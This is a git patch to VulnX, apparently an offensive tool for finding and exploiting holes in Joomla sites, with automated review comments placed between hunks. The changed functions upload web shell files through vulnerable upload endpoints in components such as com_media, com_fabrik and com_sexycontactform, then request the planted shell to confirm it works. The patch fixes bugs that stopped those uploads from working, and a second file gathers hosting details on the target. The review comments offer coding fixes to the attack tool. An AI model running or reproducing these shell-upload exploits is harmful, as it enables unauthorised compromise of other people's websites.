From c79e4c40e2ff1ec23f6f29753293c23f3cf02d7b Mon Sep 17 00:00:00 2001
From: Wiguna R <21243980+zombozo12@users.noreply.github.com>
Date: Fri, 26 May 2023 00:22:02 +0000
Subject: [PATCH] Fix: issues #100 #85 and deleted domain age
---
 modules/exploits/joomla_exploits.py | 12 ++++++------
 modules/gathering/host_gathering.py | 30 ++++++++++++-----------------
 2 files changed, 18 insertions(+), 24 deletions(-)
diff --git a/modules/exploits/joomla_exploits.py b/modules/exploits/joomla_exploits.py
index c6dd46e..9acfbb8 100644
--- a/modules/exploits/joomla_exploits.py
+++ b/modules/exploits/joomla_exploits.py
@@ -45,7 +45,7 @@ def com_jce(self):
 def com_media(self):
 self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
 endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
- self.headers={"content-type":["form-data"]}
+ self.headers['Content-Type']="form-data"
 fieldname = 'Filedata[]'
 shell = open('shell/VulnX.txt','rb')
 data = {
@@ -101,7 +101,7 @@ def com_media(self):
 #def com_jdownloadsb(self):
 # self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
 # endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php"
- # self.headers={"content-type":["form-data"]}
+ # self.headers['Content-Type']="form-data"
 # files = open('shell/VulnX.zip','rb')
 # shell = open('shell/VulnX.gif','rb')
 # data = {
@@ -131,7 +131,7 @@ def com_fabrika(self):
 self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
 endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
- self.headers={"content-type":["form-data"]}
+ self.headers['Content-Type']="form-data"
 fieldname = 'file'
 shell = open('shell/VulnX.php','rb')
 data = {
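Review bot: The new `self.headers['Content-Type']="form-data"` in com_media writes into the instance-wide header dict, so the value stays attached to every later request made through this object, including the plain GET calls in other methods. The same assignment is repeated in the hunks at lines 131, 158 and 189. A per-call copy leaves the shared state untouched: `headers = {**self.headers, 'Content-Type': 'form-data'}`, passed to the request in place of `self.headers`. The body of com_media continues outside the hunk, so how the dict is used afterwards is not visible here.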
@@ -158,7 +158,7 @@ def com_fabrikb(self):
 self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
 endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
- self.headers={"content-type":["form-data"]}
+ self.headers['Content-Type']="form-data"
 fieldname = 'file'
 shell = open('shell/VulnX.txt','rb')
 data = {
@@ -189,7 +189,7 @@ def com_foxcontact(self):
 # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
 endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
- self.headers={"content-type":["form-data"]}
+ self.headers['Content-Type']="form-data"
 fieldname = 'file'
 shell = open('shell/VulnX.txt','rb')
 data = {
@@ -353,7 +353,7 @@ def com_sexycontactform(self):
 fieldname = "image[]"
 files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
 data = { fieldname : files }
- requests.post(endpoint, data=data, heades=self.headers,verify=False).text
+ requests.post(endpoint, data=data, headers=self.headers,verify=False).text
 shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X"
 checkShell = requests.get(shellup,headers=self.headers,verify=False).text
 statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
diff --git a/modules/gathering/host_gathering.py b/modules/gathering/host_gathering.py
index 3092351..ae1698e 100644
--- a/modules/gathering/host_gathering.py
+++ b/modules/gathering/host_gathering.py
@@ -37,24 +37,18 @@ def os_server(self):
 print(' {0} Cannot Find the server headers ' .format(bad))
 def web_host(self):
- urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(self.url)
- getinfo = requests.get(urldate, self.headers,verify=False).text
- regex_date = r'Date: (.+?)-(.+?)'
- regex_date = re.compile(regex_date)
- matches = re.search(regex_date, getinfo)
 try:
- if matches:
- print(' {0} Domain Created on : {1}'.format(good, matches.group(1)))
- ip = socket.gethostbyname(hostd(self.url))
- print(' {0} CloudFlare IP : {1}'.format(good, ip))
- ipinfo = "http://ipinfo.io/" + ip + "/json"
- gather = requests.get(ipinfo, self.headers).text
-
- self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
- self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
- self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
- self.match_printer('Postal',self.match_info(r'postal\": \"(.+?)\"',gather))
- self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
- self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
+ ip = socket.gethostbyname(hostd(self.url))
+ print(' {0} CloudFlare IP : {1}'.format(good, ip))
+ ipinfo = "http://ipinfo.io/" + ip + "/json"
+ gather = requests.get(ipinfo, self.headers).text
+
+ self.match_printer('Hostname',self.match_info(r'hostname\": \"(.+?)\"',gather))
+ self.match_printer('City',self.match_info(r'city\": \"(.+?)\"',gather))
+ self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
+ self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
+ self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
+ self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
+ self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
 except Exception as err:
 print(' {0} Parse Error : {1}' .format(bad,err))
\ No newline at end of file
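Review bot: In web_host the re-indented call `requests.get(ipinfo, self.headers)` passes the header dict as the second positional argument, which requests treats as `params`, so the header values are appended to the query string sent to ipinfo.io rather than sent as request headers. The URL is also plain `http://` and the call has no timeout, so the lookup travels unauthenticated and can stall the run. Suggested: `ipinfo = "https://ipinfo.io/" + ip + "/json"` and `gather = requests.get(ipinfo, headers=self.headers, timeout=10).text`. Separately, the `CloudFlare IP` label is printed for whatever address `socket.gethostbyname` returns, and the `except Exception` branch reports DNS and network failures as `Parse Error`; both messages would be clearer if they named what actually happened.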